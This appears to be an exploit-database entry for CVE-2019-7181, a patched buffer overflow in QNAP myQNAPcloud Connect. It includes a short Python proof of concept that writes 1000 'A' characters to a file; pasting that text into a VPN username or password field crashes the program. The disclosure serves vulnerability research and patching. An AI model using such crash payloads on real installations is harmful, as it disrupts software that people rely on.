QNAP myQNAPcloud Connect "Username/Password" DOS

vendor:

myQNAPcloud Connect

by:

Dino Covotsos - Telspace Systems

7.5

CVSS

HIGH

Denial of Service

CWE

Product Name: myQNAPcloud Connect

Affected Version From: 1.3.4.0317

Affected Version To: 1.3.4.0317

Patch Exists: YES

Related CWE: CVE-2019-7181

CPE: a:qnap:myqnapcloud_connect

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows XP/7/10

2019

QNAP myQNAPcloud Connect “Username/Password” DOS

A buffer overflow vulnerability exists in QNAP myQNAPcloud Connect versions 1.3.4.0317 and below. An attacker can generate a qnap.txt file containing 1000 A characters and copy the contents of qnap.txt to the clipboard. When the contents are pasted in any username/password field (Add or Edit VPN) and the OK button is clicked, the program crashes.

Mitigation:

Update to the latest version of QNAP myQNAPcloud Connect.

Source

Exploit-DB raw data:

#!/usr/bin/python
# Exploit Title: QNAP myQNAPcloud Connect "Username/Password" DOS
# Date: 19/04/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.qnap.com
# Version: 1.3.4.0317 and below are vulnerable
# Software Link: https://www.qnap.com/en/utilities/essentials
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP/7/10 (version 1.3.3.0925)
# CVE: CVE-2019-7181
# POC
# 1.) Generate qnap.txt
# 2.) Copy the contents of qnap.txt to the clipboard
# 3.) Paste the contents in any username/password field(Add or Edit VPN)
# 4.) Click ok, program crashes.
# This vulnerability was responsibly disclosed February 3, 2019, new version has been released.

buffer = "A" * 1000

payload = buffer
try:
    f=open("qnap.txt","w")
    print "[+] Creating %s bytes QNAP payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"